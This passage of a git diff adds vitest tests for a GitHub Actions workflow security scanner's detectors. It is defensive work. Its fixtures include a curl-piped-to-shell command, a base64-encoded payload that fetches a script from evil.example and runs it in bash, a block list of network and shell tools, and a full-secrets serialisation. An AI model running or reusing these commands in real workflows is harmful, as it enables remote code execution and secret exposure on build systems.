knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow excessive permissions detector", () => { + it("flags write-all workflow permissions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + permissions: "write-all", + jobs: { + release: { + steps: [{ run: "echo release" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-excessive-permissions")).toBe( + true, + ); + }); + + it("does not flag restrictive permissions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + permissions: "read-all", + jobs: { + release: { + permissions: { + contents: "read", + }, + steps: [{ run: "echo release" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-excessive-permissions")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-forbidden-uses.test.ts b/tests/layer2/workflow-forbidden-uses.test.ts new file mode 100644 index 0000000..9bc1d3f --- /dev/null +++ b/tests/layer2/workflow-forbidden-uses.test.ts @@ -0,0 +1,78 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowForbiddenUses } from "../../src/layer2-static/detectors/workflow-forbidden-uses"; + +describe("workflow forbidden uses detector", () => { + it("flags repository actions outside an allowlist", () => { + const findings = detectWorkflowForbiddenUses({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + config: { + allow: ["github/codeql-action/*"], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-forbidden-uses"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); + + it("flags repository actions matching a denylist and ignores local and docker uses", () => { + const findings = detectWorkflowForbiddenUses({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: docker://alpine:3.20 + - uses: ./.github/actions/local + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "docker://alpine:3.20", + }, + { + uses: "./.github/actions/local", + }, + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + config: { + deny: ["actions/*"], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-forbidden-uses"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); +}); diff --git a/tests/layer2/workflow-github-env.test.ts b/tests/layer2/workflow-github-env.test.ts new file mode 100644 index 0000000..f4d3e18 --- /dev/null +++ b/tests/layer2/workflow-github-env.test.ts @@ -0,0 +1,54 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowGithubEnv } from "../../src/layer2-static/detectors/workflow-github-env"; + +describe("workflow github env detector", () => { + it("flags writes to GITHUB_ENV from a run step", () => { + const findings = detectWorkflowGithubEnv({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: pull_request +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: echo "TOKEN=foo" >> "$GITHUB_ENV" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [{ run: 'echo "TOKEN=foo" >> "$GITHUB_ENV"' }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-github-env"); + expect(findings[0]?.evidence).toContain("GITHUB_ENV"); + }); + + it("does not flag writes to GITHUB_OUTPUT", () => { + const findings = detectWorkflowGithubEnv({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: pull_request +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: echo "TOKEN=foo" >> "$GITHUB_OUTPUT" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [{ run: 'echo "TOKEN=foo" >> "$GITHUB_OUTPUT"' }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-hardcoded-container-credentials.test.ts b/tests/layer2/workflow-hardcoded-container-credentials.test.ts new file mode 100644 index 0000000..2a6b926 --- /dev/null +++ b/tests/layer2/workflow-hardcoded-container-credentials.test.ts @@ -0,0 +1,63 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowHardcodedContainerCredentials } from "../../src/layer2-static/detectors/workflow-hardcoded-container-credentials"; + +describe("workflow hardcoded container credentials detector", () => { + it("flags container image references that embed credentials", () => { + const findings = detectWorkflowHardcodedContainerCredentials({ + filePath: ".github/workflows/deploy.yml", + textContent: `on: [push] +jobs: + deploy: + runs-on: ubuntu-latest + container: + image: ghcr.io/myuser:mypassword@ghcr.io/org/private-image:latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/myuser:mypassword@ghcr.io/org/private-image:latest", + }, + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("hardcoded-container-credentials"); + }); + + it("does not flag normal image references", () => { + const findings = detectWorkflowHardcodedContainerCredentials({ + filePath: ".github/workflows/deploy.yml", + textContent: `on: [push] +jobs: + deploy: + runs-on: ubuntu-latest + container: + image: ghcr.io/org/private-image:latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/org/private-image:latest", + }, + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-impostor-commit.test.ts b/tests/layer2/workflow-impostor-commit.test.ts new file mode 100644 index 0000000..d03fdf8 --- /dev/null +++ b/tests/layer2/workflow-impostor-commit.test.ts @@ -0,0 +1,95 @@ +import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowImpostorCommit } from "../../src/layer2-static/detectors/workflow-impostor-commit"; + +const originalFetch = globalThis.fetch; + +beforeEach(() => { + vi.restoreAllMocks(); +}); + +afterEach(() => { + globalThis.fetch = originalFetch; +}); + +describe("workflow impostor commit detector", () => { + it("flags commit pins that do not exist in the referenced repository", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/commits/")) { + return new Response("not found", { status: 404 }); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowImpostorCommit({ + filePath: ".github/workflows/ci.yml", + runtimeMode: "online", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-impostor-commit"); + expect(findings[0]?.evidence).toContain("actions/checkout"); + }); + + it("does not flag commits that exist in the referenced repository", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/commits/")) { + return new Response(JSON.stringify({ sha: "c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e" }), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowImpostorCommit({ + filePath: ".github/workflows/ci.yml", + runtimeMode: "online", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-insecure-commands.test.ts b/tests/layer2/workflow-insecure-commands.test.ts new file mode 100644 index 0000000..c900fa7 --- /dev/null +++ b/tests/layer2/workflow-insecure-commands.test.ts @@ -0,0 +1,58 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowInsecureCommands } from "../../src/layer2-static/detectors/workflow-insecure-commands"; + +describe("workflow insecure commands detector", () => { + it("flags curl piped directly into a shell", () => { + const findings = detectWorkflowInsecureCommands({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + install: + runs-on: ubuntu-latest + steps: + - run: curl -fsSL https://example.com/install.sh | sh +`, + parsed: { + on: ["push"], + jobs: { + install: { + steps: [{ run: "curl -fsSL https://example.com/install.sh | sh" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-insecure-commands"); + expect(findings[0]?.evidence).toContain("curl -fsSL https://example.com/install.sh | sh"); + }); + + it("does not flag download and execute flows that do not pipe into a shell", () => { + const findings = detectWorkflowInsecureCommands({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + install: + runs-on: ubuntu-latest + steps: + - run: curl -fsSL https://example.com/install.sh -o install.sh + - run: sh install.sh +`, + parsed: { + on: ["push"], + jobs: { + install: { + steps: [ + { run: "curl -fsSL https://example.com/install.sh -o install.sh" }, + { run: "sh install.sh" }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-known-vuln-action.test.ts b/tests/layer2/workflow-known-vuln-action.test.ts new file mode 100644 index 0000000..ca6d56a --- /dev/null +++ b/tests/layer2/workflow-known-vuln-action.test.ts @@ -0,0 +1,60 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow known vulnerable action detector", () => { + it("runs only in online mode", async () => { + const commonInput = { + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml" as const, + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [{ uses: "actions/checkout@v3" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + }; + + const offline = await runStaticEngine({ + ...commonInput, + config: { + ...BASE_CONFIG, + runtimeMode: "offline", + }, + }); + + const online = await runStaticEngine({ + ...commonInput, + config: { + ...BASE_CONFIG, + runtimeMode: "online", + }, + }); + + expect(offline.some((finding) => finding.rule_id === "workflow-known-vuln-action")).toBe(false); + expect(online.some((finding) => finding.rule_id === "workflow-known-vuln-action")).toBe(true); + }); +}); diff --git a/tests/layer2/workflow-misfeature.test.ts b/tests/layer2/workflow-misfeature.test.ts new file mode 100644 index 0000000..da69fb6 --- /dev/null +++ b/tests/layer2/workflow-misfeature.test.ts @@ -0,0 +1,52 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowMisfeature } from "../../src/layer2-static/detectors/workflow-misfeature"; + +describe("workflow misfeature detector", () => { + it("flags security steps that continue on error", () => { + const findings = detectWorkflowMisfeature({ + filePath: ".github/workflows/security.yml", + textContent: `on: [push]\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - name: CodeQL Analysis\n continue-on-error: true\n run: codeql database analyze\n`, + parsed: { + on: ["push"], + jobs: { + scan: { + "runs-on": "ubuntu-latest", + steps: [ + { + name: "CodeQL Analysis", + "continue-on-error": true, + run: "codeql database analyze", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-misfeature"); + }); + + it("does not flag non-security steps with continue-on-error", () => { + const findings = detectWorkflowMisfeature({ + filePath: ".github/workflows/build.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - continue-on-error: true\n run: npm run docs:preview\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [ + { + "continue-on-error": true, + run: "npm run docs:preview", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-obfuscation.test.ts b/tests/layer2/workflow-obfuscation.test.ts new file mode 100644 index 0000000..88a6753 --- /dev/null +++ b/tests/layer2/workflow-obfuscation.test.ts @@ -0,0 +1,45 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowObfuscation } from "../../src/layer2-static/detectors/workflow-obfuscation"; + +describe("workflow obfuscation detector", () => { + it("flags encoded payload execution patterns", () => { + const findings = detectWorkflowObfuscation({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - run: echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: 'echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-obfuscation"); + }); + + it("does not flag straightforward non-obfuscated commands", () => { + const findings = detectWorkflowObfuscation({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - run: npm test\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ run: "npm test" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-overprovisioned-secrets.test.ts b/tests/layer2/workflow-overprovisioned-secrets.test.ts new file mode 100644 index 0000000..e1f32b1 --- /dev/null +++ b/tests/layer2/workflow-overprovisioned-secrets.test.ts @@ -0,0 +1,72 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowOverprovisionedSecrets } from "../../src/layer2-static/detectors/workflow-overprovisioned-secrets"; + +describe("workflow overprovisioned secrets detector", () => { + it("flags serialization of the full secrets context", () => { + const findings = detectWorkflowOverprovisionedSecrets({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " SECRETS: ${{ toJSON(secrets) }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + SECRETS: "${{ toJSON(secrets) }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-overprovisioned-secrets"); + expect(findings[0]?.evidence).toContain("toJSON(secrets)"); + }); + + it("ignores explicit secret references", () => { + const findings = detectWorkflowOverprovisionedSecrets({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " SECRET_ONE: ${{ secrets.SECRET_ONE }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + SECRET_ONE: "${{ secrets.SECRET_ONE }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-parser.test.ts b/tests/layer2/workflow-parser.test.ts new file mode 100644 index 0000000..559fef3 --- /dev/null +++ b/tests/layer2/workflow-parser.test.ts @@ -0,0 +1,46 @@ +import { describe, expect, it } from "vitest"; +import { + extractWorkflowFacts, + isGitHubWorkflowPath, +} from "../../src/layer2-static/workflow/parser"; + +describe("workflow parser", () => { + it("detects github workflow file paths", () => { + expect(isGitHubWorkflowPath(".github/workflows/ci.yml")).toBe(true); + expect(isGitHubWorkflowPath(".github/workflows/release.yaml")).toBe(true); + expect(isGitHubWorkflowPath("skills/security-review/SKILL.md")).toBe(false); + }); + + it("extracts trigger, jobs, step uses and run facts", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request", "workflow_dispatch"], + permissions: "write-all", + jobs: { + test: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + }, + { + run: "echo ${{ github.event.pull_request.title }}", + }, + ], + }, + }, + }); + + expect(facts).not.toBeNull(); + expect(facts?.triggers).toEqual(expect.arrayContaining(["pull_request", "workflow_dispatch"])); + expect(facts?.workflowPermissions).toBe("write-all"); + expect(facts?.jobs).toHaveLength(1); + expect(facts?.jobs[0]?.steps[0]?.uses).toBe("actions/checkout@v4"); + expect(facts?.jobs[0]?.steps[1]?.run).toContain("${{"); + }); + + it("returns null for non-workflow yaml", () => { + expect(extractWorkflowFacts({ foo: "bar" })).toBeNull(); + }); +}); diff --git a/tests/layer2/workflow-real-cases.test.ts b/tests/layer2/workflow-real-cases.test.ts new file mode 100644 index 0000000..df2f23f --- /dev/null +++ b/tests/layer2/workflow-real-cases.test.ts @@ -0,0 +1,67 @@ +import { readFileSync } from "node:fs"; +import { resolve } from "node:path"; +import { describe, expect, it } from "vitest"; +import type { CodeGateConfig } from "../../src/config"; +import { runScanEngine } from "../../src/scan"; + +interface RealCaseEntry { + id: string; + target: string; + expected_rule: string; + source: string; +} + +function makeConfig(): CodeGateConfig { + return { + severity_threshold: "high", + auto_proceed_below_threshold: true, + output_format: "terminal", + tui: { enabled: false, colour_scheme: "default", compact_mode: false }, + tool_discovery: { preferred_agent: "claude", agent_paths: {}, skip_tools: [] }, + trusted_directories: [], + blocked_commands: ["bash", "sh", "curl", "wget", "nc", "python", "node"], + known_safe_mcp_servers: [], + known_safe_formatters: [], + known_safe_lsp_servers: [], + known_safe_hooks: [], + unicode_analysis: true, + check_ide_settings: true, + owasp_mapping: true, + trusted_api_domains: [], + rule_pack_paths: [], + allowed_rules: [], + skip_rules: [], + suppress_findings: [], + workflow_audits: { enabled: true }, + runtime_mode: "offline", + }; +} + +function loadRealCaseIndex(): RealCaseEntry[] { + const indexPath = resolve(process.cwd(), "test-fixtures/workflow-audits/real-cases/index.json"); + return JSON.parse(readFileSync(indexPath, "utf8")) as RealCaseEntry[]; +} + +describe("workflow real-case fixtures", () => { + it("detects expected findings on commit-pinned public workflow fixtures", async () => { + for (const fixture of loadRealCaseIndex()) { + const targetPath = resolve( + process.cwd(), + "test-fixtures/workflow-audits/real-cases", + fixture.target, + ); + const report = await runScanEngine({ + version: "0.7.0", + scanTarget: targetPath, + config: makeConfig(), + }); + + const ruleIds = new Set(report.findings.map((finding) => finding.rule_id)); + expect( + ruleIds.has(fixture.expected_rule), + `${fixture.id} should detect ${fixture.expected_rule}`, + ).toBe(true); + expect(fixture.source.startsWith("https://github.com/")).toBe(true); + } + }); +}); diff --git a/tests/layer2/workflow-ref-confusion.test.ts b/tests/layer2/workflow-ref-confusion.test.ts new file mode 100644 index 0000000..0227ba4 --- /dev/null +++ b/tests/layer2/workflow-ref-confusion.test.ts @@ -0,0 +1,70 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowRefConfusion } from "../../src/layer2-static/detectors/workflow-ref-confusion"; + +describe("workflow ref confusion detector", () => { + it("flags repository actions pinned to symbolic refs", () => { + const findings = detectWorkflowRefConfusion({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-ref-confusion"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); + + it("does not flag hash-pinned, local, or docker uses", () => { + const findings = detectWorkflowRefConfusion({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 + - uses: ./.github/actions/local + - uses: docker://alpine:3.20 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@0123456789abcdef0123456789abcdef01234567", + }, + { + uses: "./.github/actions/local", + }, + { + uses: "docker://alpine:3.20", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-ref-version-mismatch.test.ts b/tests/layer2/workflow-ref-version-mismatch.test.ts new file mode 100644 index 0000000..6b23a5a --- /dev/null +++ b/tests/layer2/workflow-ref-version-mismatch.test.ts @@ -0,0 +1,111 @@ +import { beforeEach, afterEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowRefVersionMismatch } from "../../src/layer2-static/detectors/workflow-ref-version-mismatch"; + +const originalFetch = globalThis.fetch; + +beforeEach(() => { + vi.restoreAllMocks(); +}); + +afterEach(() => { + globalThis.fetch = originalFetch; +}); + +describe("workflow ref version mismatch detector", () => { + it("flags hash-pinned actions whose version comment resolves to a different commit", async () => { + const fetchSpy = vi + .spyOn(globalThis, "fetch") + .mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/git/ref/tags/v3.0.0")) { + return new Response( + JSON.stringify({ + object: { + type: "commit", + sha: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + }, + }), + { status: 200, headers: { "content-type": "application/json" } }, + ); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowRefVersionMismatch({ + filePath: ".github/workflows/release.yml", + runtimeMode: "online", + textContent: `name: release +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb # v3.0.0 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + ], + }, + }, + }, + }); + + expect(fetchSpy).toHaveBeenCalled(); + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-ref-version-mismatch"); + expect(findings[0]?.evidence).toContain("v3.0.0"); + }); + + it("does not flag matching version comments", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/git/ref/tags/v3.0.0")) { + return new Response( + JSON.stringify({ + object: { + type: "commit", + sha: "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + }), + { status: 200, headers: { "content-type": "application/json" } }, + ); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowRefVersionMismatch({ + filePath: ".github/workflows/release.yml", + runtimeMode: "online", + textContent: `name: release +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb # v3.0.0 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-secrets-inherit.test.ts b/tests/layer2/workflow-secrets-inherit.test.ts new file mode 100644 index 0000000..cfa51a6 --- /dev/null +++ b/tests/layer2/workflow-secrets-inherit.test.ts @@ -0,0 +1,57 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretsInherit } from "../../src/layer2-static/detectors/workflow-secrets-inherit"; + +describe("workflow secrets inherit detector", () => { + it("flags reusable workflow calls that inherit all secrets", () => { + const findings = detectWorkflowSecretsInherit({ + filePath: ".github/workflows/reusable.yml", + textContent: [ + "jobs:", + " call-reusable:", + " uses: ./.github/workflows/called.yml", + " secrets: inherit", + "", + ].join("\n"), + parsed: { + on: ["workflow_dispatch"], + jobs: { + "call-reusable": { + uses: "./.github/workflows/called.yml", + secrets: "inherit", + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secrets-inherit"); + expect(findings[0]?.evidence).toContain("secrets: inherit"); + }); + + it("ignores explicit secret forwarding", () => { + const findings = detectWorkflowSecretsInherit({ + filePath: ".github/workflows/reusable.yml", + textContent: [ + "jobs:", + " call-reusable:", + " uses: ./.github/workflows/called.yml", + " secrets:", + " token: ${{ secrets.TOKEN }}", + "", + ].join("\n"), + parsed: { + on: ["workflow_dispatch"], + jobs: { + "call-reusable": { + uses: "./.github/workflows/called.yml", + secrets: { + token: "${{ secrets.TOKEN }}", + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-secrets-outside-env.test.ts b/tests/layer2/workflow-secrets-outside-env.test.ts new file mode 100644 index 0000000..22af5cd --- /dev/null +++ b/tests/layer2/workflow-secrets-outside-env.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretsOutsideEnv } from "../../src/layer2-static/detectors/workflow-secrets-outside-env"; + +describe("workflow secrets outside environment detector", () => { + it("flags secret usage in jobs without an environment", () => { + const findings = detectWorkflowSecretsOutsideEnv({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " API_KEY: ${{ secrets.API_KEY }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + API_KEY: "${{ secrets.API_KEY }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secrets-outside-env"); + expect(findings[0]?.evidence).toContain("secrets.API_KEY"); + }); + + it("ignores jobs that declare a dedicated environment", () => { + const findings = detectWorkflowSecretsOutsideEnv({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " environment: production", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " API_KEY: ${{ secrets.API_KEY }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + environment: "production", + steps: [ + { + run: "./deploy.sh", + env: { + API_KEY: "${{ secrets.API_KEY }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-self-hosted-runner.test.ts b/tests/layer2/workflow-self-hosted-runner.test.ts new file mode 100644 index 0000000..bd5259f --- /dev/null +++ b/tests/layer2/workflow-self-hosted-runner.test.ts @@ -0,0 +1,54 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSelfHostedRunner } from "../../src/layer2-static/detectors/workflow-self-hosted-runner"; + +describe("workflow self-hosted runner detector", () => { + it("flags jobs that use self-hosted runners", () => { + const findings = detectWorkflowSelfHostedRunner({ + filePath: ".github/workflows/deploy.yml", + textContent: `name: deploy +on: push +jobs: + deploy: + runs-on: [self-hosted, linux] + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": ["self-hosted", "linux"], + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-self-hosted-runner"); + expect(findings[0]?.evidence).toContain("self-hosted"); + }); + + it("ignores hosted runners", () => { + const findings = detectWorkflowSelfHostedRunner({ + filePath: ".github/workflows/deploy.yml", + textContent: `jobs: + deploy: + runs-on: ubuntu-latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-stale-action-refs.test.ts b/tests/layer2/workflow-stale-action-refs.test.ts new file mode 100644 index 0000000..5bb4232 --- /dev/null +++ b/tests/layer2/workflow-stale-action-refs.test.ts @@ -0,0 +1,107 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowStaleActionRefs } from "../../src/layer2-static/detectors/workflow-stale-action-refs"; + +function makeResponse(tags: Array<{ commit: { sha: string } }>, link = "") { + return { + ok: true, + status: 200, + json: async () => tags, + headers: { + get: (name: string) => { + if (name.toLowerCase() === "link") { + return link || null; + } + return null; + }, + }, + }; +} + +describe("workflow stale action refs detector", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("flags commit pins that do not resolve to a tag", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async () => + makeResponse([ + { + commit: { + sha: "1111111111111111111111111111111111111111", + }, + }, + ]), + ), + ); + + const findings = await detectWorkflowStaleActionRefs({ + filePath: ".github/workflows/ci.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + "", + ].join("\n"), + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: 